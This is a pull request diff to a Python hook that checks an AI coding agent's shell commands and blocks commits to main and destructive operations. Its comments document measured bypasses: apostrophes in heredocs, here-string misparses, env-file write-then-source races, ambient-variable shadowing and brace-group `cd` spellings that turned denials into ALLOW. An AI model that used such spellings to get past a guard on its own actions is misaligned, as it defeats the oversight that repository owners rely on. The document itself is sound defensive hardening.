### PR TITLE
fix(guard): 15 commit-to-main spellings main allows, and the deny the here-string fix costs

### DIFF
--- a/scripts/claude-hooks/guard_core.py
+++ b/scripts/claude-hooks/guard_core.py
@@ -84,9 +84,8 @@ every deny it had. It exists because the opposite of the reverted helper was als
 a bug: the scanner tracked quote state THROUGH the body, so one apostrophe in a
 commit message (`don't`) opened a quote that never closed and swallowed every
 command AFTER the heredoc. Measured on the shipped guard — `git commit`,
-`git stash`, `git clean -f`, `talosctl reset`, `mkfs`, `dd of=/dev/sdc` and
-`pkill -f` all resolved ALLOW behind one apostrophe. The change can only make
-more argv visible, never fewer.
+`git stash`, `git reset --hard`, `git clean -fd`, `talosctl reset`, `mkfs`,
+`dd of=/dev/sdc` and `pkill -f` all resolved ALLOW behind one apostrophe.
 
 🔴 The argv-based checks below are NOT a return of that helper, and the
 distinction is load-bearing. They never BLANK bytes and never decide which parts
@@ -419,10 +418,18 @@ _SHELLS = {"bash", "sh", "zsh", "dash", "ksh", "ash", "busybox"}
 
 
 # A scanned segment: its text, and the SUBSHELL NESTING DEPTH it sits at. The
-# depth is what lets a caller know that a `cd` inside `( … )` does not leak out
-# — see `_commands_with_cwd`. Every existing caller ignores it via
-# `split_commands`, whose contract is unchanged.
+# depth is what lets `_commands_with_cwd` know that a `cd` inside `( … )` does
+# not leak out of it — MEASURED in bash 5.3.15: `cd /; (cd /tmp); pwd` prints
+# `/`, while `cd /; { cd /tmp; }; pwd` prints `/tmp`, so a BRACE group is NOT a
+# scope and is deliberately not counted here.
 _Seg = collections.namedtuple("_Seg", "text depth")
+
+# A substitution or heredoc body, and the INDEX INTO `segs` at which its
+# operator appeared. That index is what lets `_commands_with_cwd` judge the body
+# at the cwd in effect WHERE IT SITS, rather than at the caller's cwd (PR #396's
+# bug) or at the line's final cwd (which would be wrong the other way round for
+# `bash <<EOF … EOF; cd elsewhere`).
+_Body = collections.namedtuple("_Body", "text at")
 
 # A heredoc tag as bash accepts it unquoted. Quoted tags (`<<'EOF'`, `<<"EOF"`)
 # are read by _read_heredoc_tag directly.
@@ -487,18 +494,28 @@ def _consume_heredocs(text, i, pending):
     return i, bodies
 
 
-def _scan(text, _recovery=0):
+def _scan(text, _lift=True, _herestring=True, _recovery=0):
     """`([_Seg, …], [substitution-body, …], [heredoc-body, …])`.
+
+    (`_scan_raw` is the same walk returning a fourth element, `diverged` — see
+    there. This wrapper is what tests and readers should use.)
+
+    🔴 `_lift=False` REPRODUCES THE SHIPPED SCANNER EXACTLY — heredoc operators
+    are ordinary characters and an unterminated quote is not recovered from. It
+    is not vestigial and it is not dead code: `split_commands` runs BOTH modes
+    and unions the results, which is what makes this change additive by
+    CONSTRUCTION instead of by assertion. Read the argument there before removing
+    it; a 20,000-input fuzz found four inputs where lifting ALONE lost a deny.
 
     🔴 HEREDOC BODIES ARE LIFTED OUT OF THE SCAN, and that is a BUG FIX, not a
     tidy-up. The scanner tracks quote state character by character, and a heredoc
     body is ordinary prose — so a single apostrophe in a commit message
     (`don't`, `it's`) OPENED a quote that never closed, and every command after
     the heredoc was swallowed into that quoted buffer instead of being emitted as
-    its own segment. Measured against the shipped guard, cwd on `trunk`:
+    its own segment. Measured against the shipped guard, cwd on `main`:
 
-        DENY   cat > /tmp/m <<'EOF' / do not stage / EOF / git commit -F /tmp/m
-        ALLOW  cat > /tmp/m <<'EOF' / don't stage  / EOF / git commit -F /tmp/m
+        DENY   cat > /tmp/m <<EOF / do not stage / EOF / git commit -m x
+        ALLOW  cat > /tmp/m <<EOF / don't stage  / EOF / git commit -m x
         ALLOW  …same apostrophe body… / git stash push -m wip
         ALLOW  …same apostrophe body… / talosctl -n 1.2.3.4 reset
 
@@ -513,10 +530,44 @@ def _scan(text, _recovery=0):
     execute) keeps exactly the coverage it has today, and a body that merely
     QUOTES a banned command still denies via the documented escape hatch. All
     that changes is that a body can no longer corrupt the parse of the commands
-    AROUND it. The change is strictly ADDITIVE — it can only make more argv
-    visible, never fewer — which is why it cannot loosen any check.
+    AROUND it.
+    """
+    segs, subs, bodies, _ = _scan_raw(text, _lift, _herestring, _recovery)
+    return segs, [s.text for s in subs], [b.text for b in bodies]
+
+
+def _scan_raw(text, _lift=True, _herestring=True, _recovery=0):
+    """`_scan` plus `diverged` — True when this walk did something SOME OTHER
+    reading of the same text would not have: consumed a heredoc operator,
+    skipped a here-string, or re-read a tail an unterminated quote hid.
+
+    🔴 TWO KNOBS, NOT ONE, AND THAT IS THE WHOLE SAFETY ARGUMENT. Each names a
+    reading of the text that some shipped version of this guard actually had,
+    and `split_commands` UNIONS all three so no reading's denies are lost:
+
+        _lift=True,  _herestring=True    what bash really means
+        _lift=True,  _herestring=False   what `main` does today (it reads the
+                                         SECOND `<` of `<<<x` as `<<` + tag `x`)
+        _lift=False, _herestring=False   the pre-heredoc-fix scanner
+
+    The middle one is not academic. `main`'s misparse lifts the text after a
+    here-string into a heredoc BODY, which is reparsed with fresh quote state
+    and so accidentally exposes argv that the correct reading leaves buried in a
+    balanced quote. Measured, seven inputs across `git stash`, `git clean`,
+    `mkfs`, `dd`, `pkill` and `talosctl`: DENY on `main`, ALLOW on a scanner that
+    only fixes the here-string. Being right about bash is not a licence to lose
+    a deny.
+
+    `diverged is False` is a PROOF that `_lift=True` and `_lift=False` produced
+    the same segments, which is what lets `split_commands` skip the second scan
+    for the ~everything that contains neither a heredoc nor an odd quote. It is
+    computed rather than guessed for a reason: a textual precondition like
+    "`<<` in text or an odd quote count" is UNSOUND — `"'" 'x` leaves an
+    unterminated `'` with an EVEN count of them, so a guard keyed on parity
+    would silently skip the union on exactly the shape it exists for.
     """
     segs, subs, bodies = [], [], []
+    diverged = False
     buf = []
     i, n = 0, len(text)
     quote = None
@@ -542,7 +593,7 @@ def _scan(text, _recovery=0):
             j = text.find("`", i + 1)
             if j == -1:
                 j = n
-            subs.append(text[i + 1:j])
+            subs.append(_Body(text[i + 1:j], len(segs)))
             i = j + 1
             continue
         if c == "$" and i + 1 < n and text[i + 1] == "(":
@@ -553,13 +604,21 @@ def _scan(text, _recovery=0):
                 elif text[j] == ")":
                     sdepth -= 1
                 j += 1
-            subs.append(text[i + 2:j - 1 if sdepth == 0 else n])
+            subs.append(_Body(text[i + 2:j - 1 if sdepth == 0 else n], len(segs)))
             i = j
             continue
-        # A heredoc OPERATOR (`<<TAG`, `<<-TAG`, `<<'TAG'`). `<<<` is a
-        # here-STRING — it has no body and no terminator line, so it must not be
-        # treated as one.
-        if text.startswith("<<", i) and not text.startswith("<<<", i):
+        # 🔴 A here-STRING (`<<<`) has no body and no terminator line, so it is
+        # consumed WHOLE. Testing `not startswith("<<<")` inside the heredoc
+        # branch is not enough and was measured wrong: the scan also visits the
+        # SECOND `<`, where `<<<x` reads as `<<` + tag `x` and the entire rest of
+        # the text is swallowed as an unterminated body. Skipping all three
+        # characters is the only place that cannot be re-entered. (No quote,
+        # paren or separator character is skipped, so legacy mode is unaffected —
+        # asserted by the legacy-equivalence fuzz.)
+        if _herestring and text.startswith("<<<", i):
+            buf.append("<<<"); i += 3; diverged = True; continue
+        # A heredoc OPERATOR (`<<TAG`, `<<-TAG`, `<<'TAG'`, `<<\TAG`).
+        if _lift and text.startswith("<<", i):
             j = i + 2
             strip_tabs = False
             if j < n and text[j] == "-":
@@ -572,6 +631,7 @@ def _scan(text, _recovery=0):
             if tag is not None:
                 buf.append(text[i:after])     # keep the operator in the segment
                 pending.append((tag, strip_tabs))
+                diverged = True
                 i = after
                 continue
         if c in "()":                 # subshell parens are not part of argv
@@ -588,7 +648,9 @@ def _scan(text, _recovery=0):
             i += len(matched)
             if matched == "\n" and pending:
                 i, opened = _consume_heredocs(text, i, pending)
-                bodies.extend(opened)
+                # `len(segs) - 1`: the operator sat in the segment that was JUST
+                # closed by this newline, not in the one about to start.
+                bodies.extend(_Body(b, len(segs) - 1) for b in opened)
                 pending = []
             continue
         buf.append(c); i += 1
@@ -609,12 +671,19 @@ def _scan(text, _recovery=0):
     # can only surface argv the first pass buried — which is the only direction a
     # guard may err in. Each pass consumes at least the quote character, so it
     # terminates; the limit only bounds adversarial input full of odd quotes.
-    if quote is not None and quote_at is not None and _recovery < _QUOTE_RECOVERY_LIMIT:
-        r_segs, r_subs, r_bodies = _scan(text[quote_at + 1:], _recovery + 1)
-        segs.extend(_Seg(s.text, quote_depth + s.depth) for s in r_segs)
-        subs.extend(r_subs)
-        bodies.extend(r_bodies)
-    return segs, subs, bodies
+    if _lift and quote is not None and quote_at is not None:
+        # The quote was never closed, so the segments after it are a fact about
+        # the corruption, not about the command — `diverged` regardless of
+        # whether the recovery budget is left to act on it.
+        diverged = True
+        if _recovery < _QUOTE_RECOVERY_LIMIT:
+            r_segs, r_subs, r_bodies, _ = _scan_raw(
+                text[quote_at + 1:], _lift, _herestring, _recovery + 1)
+            at = len(segs)          # the recovered segments start here
+            segs.extend(_Seg(s.text, quote_depth + s.depth) for s in r_segs)
+            subs.extend(_Body(s.text, at + s.at) for s in r_subs)
+            bodies.extend(_Body(b.text, at + b.at) for b in r_bodies)
+    return segs, subs, bodies, diverged
 
 
 def split_commands(text, _depth=0):
@@ -624,13 +693,61 @@ def split_commands(text, _depth=0):
     HEREDOC as its own text, because a substitution body really does execute and
     a heredoc body may (`bash <<EOF`). Linear scan — no regex, so no backtracking
     to worry about on a guard that runs per call.
+
+    🔴 THE SHIPPED PARSE IS KEPT, NOT REPLACED — `_scan(text, _lift=False)` is
+    the byte-for-byte old scanner, and its segments are unioned in. This is the
+    load-bearing line of the whole change, and it is here because ASSERTING
+    additivity was not enough:
+
+    Lifting a heredoc body out CHANGES THE QUOTE STATE of everything after it,
+    and the old parse's corrupt state sometimes exposed argv the clean parse
+    hides behind a quote that now balances differently. Measured, 20,000 random
+    inputs, verdicts from the full 15-check policy: lifting alone turned FOUR
+    DENYs into ALLOWs. One of them —
+
+        '-m' || <<-EOF / it's / EOF / "won't && clean; bash `mkfs.ext4` …
+
+    — denied on the shipped guard because its runaway quote happened to leave
+    the backtick substitution unquoted, and allowed on the lift-only scanner
+    because the same bytes now sit inside a balanced-looking quote. Neither
+    parse is "right" about text bash itself rejects as unterminated; a guard
+    must simply not lose the deny. Taking the union makes "this can only make
+    more argv visible, never fewer" TRUE BY CONSTRUCTION rather than by
+    argument, so no future fuzz seed can find a fifth case.
+
+    The second scan is SKIPPED when the first one reports `diverged is False` —
+    a proof, not a heuristic, that the two modes produced identical segments
+    (see `_scan_raw`). So an ordinary command line, which is ~every call this
+    hook sees, pays one scan exactly as it does today; only text carrying a
+    heredoc or an unterminated quote pays for both.
     """
-    segs, subs, bodies = _scan(text)
-    out = [s.text for s in segs] + subs
+    segs, subs, bodies, diverged = _scan_raw(text)
+    out = [s.text for s in segs] + [s.text for s in subs]
     for body in bodies:
-        out.extend(split_commands(body, _depth + 1)
-                   if _depth < _BODY_RECURSION_LIMIT else [body])
-    return [s for s in out if s.strip()]
+        out.extend(split_commands(body.text, _depth + 1)
+                   if _depth < _BODY_RECURSION_LIMIT else [body.text])
+    if diverged:
+        # Every OTHER reading this guard has ever had, unioned in. See
+        # `_scan_raw` for why each one is here; the cost is paid only by text
+        # the readings actually disagree about.
+        for lift, herestring in ((True, False), (False, False)):
+            alt_segs, alt_subs, alt_bodies, _ = _scan_raw(text, lift, herestring)
+            out.extend(s.text for s in alt_segs)
+            out.extend(s.text for s in alt_subs)
+            # 🔴 The alternative reading's BODIES too, not just its segments.
+            # Main's `<<<x` misparse puts the argv it accidentally exposes
+            # INSIDE a heredoc body, so a union that only took segments recovered
+            # none of the seven here-string denies — measured, all seven still
+            # ALLOW, with the union in place and the flag set correctly.
+            for body in alt_bodies:
+                out.extend(split_commands(body.text, _depth + 1)
+                           if _depth < _BODY_RECURSION_LIMIT else [body.text])
+    seen, kept = set(), []
+    for s in out:
+        if s.strip() and s not in seen:
+            seen.add(s)
+            kept.append(s)
+    return kept
 
 
 def _tokenise(seg):
@@ -1161,9 +1278,27 @@ def _is_dry_run_flag(flag):
 # `cd`/`pushd` used to be found with a REGEX over the raw text, which could only
 # ever produce a set of "directories this line mentions" — never an answer to
 # "which one is the command standing in". That is now `_commands_with_cwd`,
-# which sees `cd` as argv[0] of a segment and tracks subshell scope, so the
-# regex (and the union it fed) is gone. `_CWD_CHANGERS` is its replacement.
+# which sees `cd` as the command word of a segment and tracks subshell scope.
+# `_CWD_CHANGERS` is its replacement.
 #
+# 🔴 The regex is gone but its ONE genuine advantage must not be: it matched a
+# `cd` after `{`, `!`, `then`, `do` — any of `[;&|(){}'"]` — because it keyed on
+# a character class rather than on argv[0]. A walk that only looks at argv[0]
+# misses `{ cd <main>; git commit; }`, `! cd <main>; git commit`,
+# `if true; then cd <main>; git commit; fi`, and the `do` of a loop. Measured in
+# bash 5.3.15: the cwd really does move in ALL of those (only `( … )` contains
+# it). `_SHELL_NOISE` below is the replacement for that character class, applied
+# to TOKENS instead of to characters.
+_CWD_CHANGERS = frozenset({"cd", "pushd"})
+
+# Tokens that may PRECEDE the real command word in a segment without being it.
+# `{`/`}` are brace-group delimiters, `!` is pipeline negation, and the rest are
+# reserved words that introduce a compound-command body. None of them is a
+# command, and none of them opens a cwd scope — again, MEASURED, not assumed.
+_SHELL_NOISE = frozenset({"{", "}", "!", "then", "else", "elif", "do", "done",
+                          "fi", "esac", "in", "until", "while", "if", "for",
+                          "select", "case"})
+
 # `GIT_DIR=`/`GIT_WORK_TREE=` env prefixes. The parser strips `VAR=` prefixes off
 # the argv (correctly — they are not the command), so the only place these
 # survive is the raw text.
@@ -1186,15 +1321,15 @@ def _safe_getcwd():
         return None
 
 
-# A `$NAME` / `${NAME}` reference. Used to finish the job `os.path.expandvars`
-# starts: expandvars only knows the HOOK PROCESS's environment, and the variable
-# that matters here (`WT`, `REPO`, …) is set by the command line itself.
+# A `$NAME` / `${NAME}` reference. Finishes the job `os.path.expandvars` starts:
+# expandvars only knows the HOOK PROCESS's environment, and the variable that
+# matters here (`WT`, `REPO`, …) is set by the command line itself.
 _VAR_REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)")
 
 # `NAME=VALUE`, the shell's assignment form.
 _ASSIGNMENT = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", re.S)
 
-# Words that may PRECEDE an assignment and still leave it an assignment.
+# Words that may PRECEDE an assignment and still leave it a PERSISTENT one.
 _ASSIGN_LEADERS = frozenset({"export", "declare", "typeset", "local", "readonly"})
 
 # The two spellings of "run this file's assignments in my shell".
@@ -1205,13 +1340,22 @@ _SOURCE_CMDS = frozenset({".", "source"})
 _ENV_FILE_MAX_BYTES = 64 * 1024
 _ENV_FILE_MAX_LINES = 400
 
+# The value a POISONED name resolves to: a path that cannot be a directory on
+# any host. Under `/dev/null/` so `os.path.isdir` answers False rather than
+# raising — a NUL byte would crash the check it is meant to fail.
+_UNRESOLVABLE = "/dev/null/guard-unresolvable"
+
 
 def _literal_value(value):
     """The value of an assignment, IF it is a plain literal — else None.
 
-    Anything carrying `$`, a backtick or a command substitution is not something
-    this guard can evaluate, and guessing at it is how a resolver starts naming
-    directories the command never touches.
+    🔴 Anything carrying `$`, a backtick or a command substitution is not
+    something this guard can evaluate, and guessing at it is how a resolver
+    starts naming directories the command never touches. `$` must stay in this
+    test even though `_subst_vars` could sometimes fill it: a value like
+    `$HOME/../devrc` resolved from a PARTIAL variable map is a guess, and the
+    fail-closed reading of "I cannot evaluate this" is to drop the name so the
+    cwd fallback applies.
     """
     if value is None:
         return None
@@ -1225,7 +1369,8 @@ def _subst_vars(value, cvars):
     """Fill `$NAME`/`${NAME}` from `cvars`, leaving unknown names untouched."""
     if not cvars or "$" not in value:
         return value
-    return _VAR_REF.sub(lambda m: cvars.get(m.group(1) or m.group(2), m.group(0)), value)
+    return _VAR_REF.sub(lambda m: cvars.get(m.group(1) or m.group(2), m.group(0)),
+                        value)
 
 
 def _env_file_vars(raw, base, known):
@@ -1234,7 +1379,7 @@ def _env_file_vars(raw, base, known):
 
     Reading it is what makes the mandated worktree recipe resolvable at all. The
     house recipe is `WT=/tmp/wt-$$` — a value this guard can never evaluate,
-    because `$$` is the SHELL's pid — and the observed agent pattern is to write
+    because `$$` is the SHELL's pid — so the observed agent pattern is to write
     the EXPANDED path into a scratchpad env file in one tool call and `. ` it in
     the next. The file therefore holds the literal directory; the command text
     never does.
@@ -1272,118 +1417,21 @@ def _env_file_vars(raw, base, known):
     return out
 
 
-# The value a POISONED name resolves to: a path that cannot be a directory on
-# any host. Under `/dev/null/` so `os.path.isdir` answers False rather than
-# raising — a NUL byte would crash the check it is meant to fail.
-_UNRESOLVABLE = "/dev/null/guard-unresolvable"
-
-
-def _command_vars(cmd, base):
-    """Shell variables this command line SETS, as far as they can be evaluated.
-
-    🔴 THE ROOT CAUSE OF THE FALSE POSITIVE THIS FIXES. `_resolve_dir` used only
-    `os.path.expandvars`, which reads the HOOK PROCESS's environment — and the
-    variable naming the worktree is set by the command itself, so it was never
-    there. `git -C "$WT" commit` therefore resolved to NOTHING, fell back to the
-    caller's cwd, and denied by naming the primary clone: a false positive on
-    precisely the worktree workflow the deny message goes on to RECOMMEND.
-    Measured on the shipped guard, cwd = a clone on `trunk`, `$WT` = a worktree
-    on a topic branch:
-        DENY   WT=<worktree>; git -C "$WT" commit -F <file>
-        DENY   . <env-file>; git -C "$WT" commit -F <file>
-        DENY   WT=<worktree>; (cd "$WT" && git commit -F <file>)
-    all three naming `trunk` in the primary clone, which none of them touch.
-
-    A name assigned TWICE to different literals, or once to anything with a `$`
-    or a substitution in it, is dropped rather than guessed — an unresolved name
-    then falls back to the cwd exactly as before, which is the fail-closed
-    direction this function must not weaken.
-    """
-    vals, poisoned = {}, set()
-
-    def note(name, value):
-        if name in poisoned:
-            return
-        val = _literal_value(value)
-        if val is None or (name in vals and vals[name] != val):
-            poisoned.add(name)
-            vals.pop(name, None)
-            return
-        vals[name] = val
-
-    # 🔴 TOP-LEVEL SEGMENTS ONLY — `_scan(cmd)[0]`, not `split_commands`, and the
-    # difference is a hole this change would otherwise have opened itself. A
-    # heredoc body is PROSE; if its lines could register assignments, a commit
-    # message containing the line `WT=/tmp/anything` would decide which repo the
-    # guard judges. Reading only the real command line keeps the value under the
-    # control of the command rather than of its message text, and an assignment
-    # the guard therefore cannot see just falls back to the cwd — fail closed.
-    sourced = []
-    for seg in _scan(cmd)[0]:
-        toks = _tokenise(seg.text)
-        i = 0
-        while i < len(toks):
-            m = _ASSIGNMENT.match(toks[i])
-            if m:
-                note(m.group(1), m.group(2))
-                i += 1
-                continue
-            if os.path.basename(toks[i]) in _ASSIGN_LEADERS:
-                i += 1
-                continue
-            break
-        if i < len(toks) and toks[i] in _SOURCE_CMDS and i + 1 < len(toks):
-            sourced.append(toks[i + 1])
-
-    # 🔴 A POISONED NAME IS PINNED UNRESOLVABLE, not merely left absent. Since
-    # `cvars` is consulted BEFORE the environment, "absent" would mean "fall
-    # through to `expandvars`" — so a name the command assigned ambiguously would
-    # quietly resolve to a stale ambient export of that name, reintroducing the
-    # guard-vs-shell disagreement the ordering exists to remove, by the back
-    # door. The command DID assign this name; the guard just cannot say to what,
-    # and the honest answer is "unknown", never "whatever it used to mean".
-    # Pinned by test_an_ambiguous_name_does_not_fall_through_to_the_ambient_value
-    # — written expecting it to pass, and it did not.
-    for name in poisoned:
-        vals[name] = _UNRESOLVABLE
-
-    # A sourced file is the LOWER layer: an assignment written in the command
-    # text itself is more specific and wins, and a poisoned name stays poisoned.
-    for raw in sourced:
-        for name, val in _env_file_vars(raw, base, vals).items():
-            if name not in vals and name not in poisoned:
-                vals[name] = val
-    return vals
-
-
 def _resolve_dir(value, base, cvars=None):
     """A command-supplied path -> an existing directory, or None.
 
-    Expands `$HANDLE` (from `cvars` — the variables the command line itself sets
-    — FIRST, then from the hook process's environment) and `~`, resolves a
-    relative path against `base`, and maps `<repo>/.git` onto `<repo>` so a
-    `--git-dir` is judged as its worktree.
-
-    🔴 THAT ORDER IS THE WHOLE POINT AND IT USED TO BE THE OTHER WAY ROUND.
-    `expandvars` reads the hook's OWN environment, which on this host carries
-    pre-exported handles (`$DEVRC`, `$DATAPACKET`, …). When a command re-points
-    one of those names at a different directory, the shell uses the command's
-    value and the guard used the ambient one — so the two disagreed about which
-    repo was being committed in, in BOTH directions. Measured against the
-    previous order, ambient `$WT` and a command that reassigns it:
-
-        ambient=<feature repo>, command `WT=<repo on main>; git -C "$WT" commit`
-            -> ALLOW, and the commit really does land on main   (FAIL-OPEN)
-        ambient=<repo on main>, command `WT=<feature repo>; git -C "$WT" commit`
-            -> DENY, blocking work that was never on main       (false positive)
-
-    A shell evaluates the assignment it just executed, not a stale export of the
-    same name; so does this now. `cvars` is already fail-closed about what it
-    will evaluate (a name assigned twice, or to anything containing `$`, is
-    dropped), so preferring it cannot resolve a value the guard had to guess.
+    Expands `$HANDLE` (from the environment first, then from `cvars` — the
+    variables the command line itself sets) and `~`, resolves a relative path
+    against `base`, and maps `<repo>/.git` onto `<repo>` so a `--git-dir` is
+    judged as its worktree.
     """
     if not value:
         return None
+    # 🔴 `cvars` FIRST, the environment second (#403). `expandvars` reads the
+    # HOOK's own environment, which on this host carries pre-exported handles
+    # (`$DEVRC`, `$DATAPACKET`, …). When a command re-points one of those names,
+    # the shell uses the command's value; a guard that used the ambient one
+    # disagreed with the shell in BOTH directions, and one of them fails open.
     value = _subst_vars(value.strip("\"'"), cvars)
     if "$" in value:
         value = os.path.expandvars(value)
@@ -1435,6 +1483,12 @@ def _dash_c_dir(argv, base, cvars=None, unresolved=None):
     # (the only handle test went through this copy), so that mutant SURVIVED. A
     # predicate duplicated across call sites is wrong at N-1 of them eventually;
     # here it was merely untested, which is how it starts.
+    # 🔴 `unresolved` defaults to a real list, not None. It used to default to
+    # None and be appended to unconditionally — a latent AttributeError on the
+    # first caller that omitted it, on a check whose exceptions become a BLANKET
+    # deny of every command in the session.
+    if unresolved is None:
+        unresolved = []
     cur, i, saw = base, 1, False
     while i < len(argv):
         tok = argv[i]
@@ -1488,10 +1542,10 @@ def _git_dir_env_targets(cmd, base, cvars=None):
 
     Kept as a WHOLE-TEXT scan rather than folded into the per-segment walk, and
     deliberately: these two variables OVERRIDE the working directory, so an
-    `export GIT_DIR=…` earlier in the line still governs a later bare `git
-    commit`. Judging them IN ADDITION to the effective cwd is the fail-closed
-    direction, and it is what keeps the audit-found
-    `GIT_DIR=<main>/.git … git commit` hop denied.
+    `export GIT_DIR=…` earlier in the line still governs a later bare
+    `git commit`. Judging them IN ADDITION to the effective cwd is the
+    fail-closed direction and keeps the audit-found `GIT_DIR=<main>/.git … git
+    commit` hop denied.
     """
     out = []
     for m in _GIT_DIR_ENV.finditer(cmd):
@@ -1501,68 +1555,300 @@ def _git_dir_env_targets(cmd, base, cvars=None):
     return list(dict.fromkeys(out))
 
 
-_CWD_CHANGERS = frozenset({"cd", "pushd"})
+def _command_word(toks):
+    """`(index-of-the-command-word, [leading NAME=VALUE assignments], exported)`.
+
+    Skips the assignment prefix and the reserved words / brace-group delimiters
+    a command word can hide behind. Returns `len(toks)` when the segment has no
+    command word at all — which is exactly how a PERSISTENT assignment is told
+    apart from a command-PREFIX one.
+
+    `exported` says whether an `export`-family leader introduced them. That
+    matters because a heredoc body is a SEPARATE PROCESS: measured in bash,
+    `WT=x; bash <<EOF … $WT … EOF` sees `<unset>` while
+    `export WT=x; bash <<EOF …` sees `x`.
+    """
+    assigns, i, exported = [], 0, False
+    while i < len(toks):
+        m = _ASSIGNMENT.match(toks[i])
+        if m:
+            assigns.append((m.group(1), m.group(2)))
+            i += 1
+            continue
+        if os.path.basename(toks[i]) in _ASSIGN_LEADERS:
+            exported = exported or os.path.basename(toks[i]) == "export"
+            i += 1
+            continue
+        if toks[i] in _SHELL_NOISE:
+            i += 1
+            continue
+        break
+    return i, assigns, exported
 
 
-def _commands_with_cwd(text, base, cvars=None, _depth=0):
-    """`[(argv, cwd-in-effect), …]` — every real argv, paired with the directory
-    the shell is standing in WHEN IT RUNS.
+def _written_paths(text):
+    """Every token this command line mentions MORE THAN ONCE, as raw strings.
 
-    🔴 THE SECOND HALF OF THE FALSE POSITIVE. The previous design could not
-    answer "where does this command run?", so for a bare `git commit` it judged
-    the UNION of the caller's cwd and every `cd` target anywhere in the text, and
-    denied if ANY of them was a blocked repo. That over-approximation denied the
-    mandated worktree spellings outright:
-        DENY   (cd <worktree-on-a-topic-branch> && git commit -F <file>)
-        DENY   bash -c 'cd <worktree-on-a-topic-branch> && git commit …'
-    from a cwd that merely HAPPENED to sit on trunk — the commit does not touch
-    that repo at all. The union was chosen because "the guard cannot know which
-    `cd` won"; it can, if it tracks position and scope, which is what this does.
+    🔴 THE TOCTOU GUARD, deliberately blunt. `_env_file_vars` reads a file the
+    COMMAND TEXT names, and the command may be the very thing that WRITES it:
 
-    Scope is the part that must not be lost. A `cd` inside `( … )` does NOT leak
-    to the commands after the subshell, so `_scan`'s per-segment depth drives a
-    stack: entering a subshell pushes the current directory, leaving it pops.
-    That keeps the negative control denying:
-        DENY   (cd <worktree>; ls); git commit        <- the cd did not survive
+        printf 'WT=<main-repo>\\n' > /tmp/wt.env && . /tmp/wt.env \\
+          && git -C "$WT" commit -m x
 
-    A `cd` whose target does not resolve leaves the directory UNCHANGED, which
-    keeps the caller's cwd in play — the fail-closed direction, and the same
-    direction an unresolvable `-C` takes.
+    Reading `/tmp/wt.env` as it is NOW yields whatever a PREVIOUS call left
+    there — a safe worktree — while the command commits into `<main-repo>`.
+    Measured: base DENY (unresolvable `-C`, cwd fallback), PR #396 head ALLOW.
 
-    KNOWN LIMIT, stated rather than papered over: this walks positions, not
-    control flow, so a `cd` that would be SKIPPED at runtime (`false && cd <x>;
-    git commit`) is still treated as having happened. That direction can only
-    mis-attribute a bare commit to a directory the line explicitly names, and the
-    ordinary `cd <path> && git …` shape stays blocked by `check_cd_then_git`
-    regardless.
+    Rather than enumerate the ways a shell can write a file (`>`, `>>`, `tee`,
+    `cp`, `mv`, `sed -i`, `dd of=`, a python one-liner…) — an enumeration that
+    fails OPEN on the first spelling it misses — this refuses to resolve from any
+    path the line mentions twice. A redirection target is a token, so
+    `> /tmp/wt.env` puts the path in the token stream beside the `. /tmp/wt.env`
+    that reads it. Sourcing a file the line never otherwise names is unaffected,
+    which is the whole legitimate pattern; anything else falls back to the cwd,
+    i.e. fail CLOSED.
+    """
+    counts = collections.Counter()
+    for seg in split_commands(text):
+        for tok in _tokenise(seg):
+            counts[tok] += 1
+    return {tok for tok, n in counts.items() if n > 1}
+
+
+# How many distinct literals one ambiguous name may contribute as extra judged
+# directories. A bound, not a policy: text engineered to assign one name a
+# thousand paths must not make a per-Bash-call hook run a thousand `git` reads.
+_AMBIGUOUS_VALUE_LIMIT = 8
+
+
+def _ambiguous_dirs(argv, base, cvars, ambiguous):
+    """Directories a `$NAME` in this argv could ALSO have meant.
+
+    Only names the argv actually REFERENCES are expanded — a variable the line
+    happens to assign twice does not drag its values into the verdict for an
+    unrelated command.
+    """
+    if not ambiguous:
+        return []
+    out = []
+    for name, values in ambiguous.items():
+        ref_brace, ref_bare = "${%s}" % name, "$" + name
+        if not any(ref_brace in t or ref_bare in t for t in argv):
+            continue
+        for value in values:
+            resolved = _resolve_dir(value, base, cvars)
+            if resolved:
+                out.append(resolved)
+    return list(dict.fromkeys(out))
+
+
+# Independent budgets. They used to be ONE `_depth`, spent on both the body
+# recursion and the nested-shell recursion, so four levels of `bash <<EOF`
+# nesting lost the commit inside (measured: base DENY, PR #396 head ALLOW).
+_WALK_BODY_LIMIT = 4
+_WALK_SHELL_LIMIT = 3
+
+
+def _commands_with_cwd(text, base, cvars=None, _body=0, _shell=0, _seen=None,
+                       _novars=False):
+    """`[(argv, cwd-in-effect, vars-in-scope), …]` — every real argv, paired with
+    the directory the shell is standing in WHEN IT RUNS and the variables it can
+    see, both resolved POSITIONALLY.
+
+    `_novars=True` runs the same walk with NO variable resolution and NO file
+    reads. That is the cheap pass `check_git_commit_to_main` gates on, so its
+    gate and its loop are two runs of ONE function rather than two populations
+    that neither dominates.
+
+    🔴 THE MODEL IS BASH'S, AND IT WAS MEASURED IN BASH 5.3.15 RATHER THAN
+    REASONED (`printf '%s' "$PWD"` / `"${WT-<unset>}"` after each shape):
+
+      * `(cd /tmp)` does NOT move the caller's cwd; `{ cd /tmp; }`,
+        `if true; then cd /tmp; fi`, `for i in 1; do cd /tmp; done` and
+        `! cd /tmp` ALL do. So `( … )` is the only scope, and the reserved words
+        are handled by `_command_word` skipping them rather than by a stack.
+      * `WT=a; . file` where the file sets `WT=b` leaves `WT=b` — the SOURCED
+        FILE WINS, because it is read LATER. `. file; WT=a` leaves `WT=a`. It is
+        last-write-wins by POSITION, not a fixed precedence between the two
+        sources. PR #396 had this inverted (command text always beat the file),
+        which let `WT=<safe-worktree>; . <file naming main>; git -C "$WT" commit`
+        resolve to the safe worktree while bash committed into main.
+      * `WT=x true` does NOT persist (a command-PREFIX assignment); `WT=x`,
+        `export WT=x` and `{ WT=x; }` do. `(WT=x)` does not.
+      * A heredoc body and a `$( )` substitution both run at the CURRENT cwd, so
+        `cd <main>; bash <<'EOF' / git commit / EOF` really does commit into
+        `<main>`. PR #396 judged bodies at `base`, which allowed exactly that.
+
+    WHAT IS DELIBERATELY NOT MODELLED, each in the fail-CLOSED direction:
+
+      * This walks POSITIONS, not control flow, so a `cd` that would be SKIPPED
+        at runtime (`false && cd <x>; git commit`) is treated as having
+        happened. That can only mis-attribute a bare commit to a directory the
+        line explicitly names, and `check_cd_then_git` still covers the ordinary
+        `cd <path> && git …` shape.
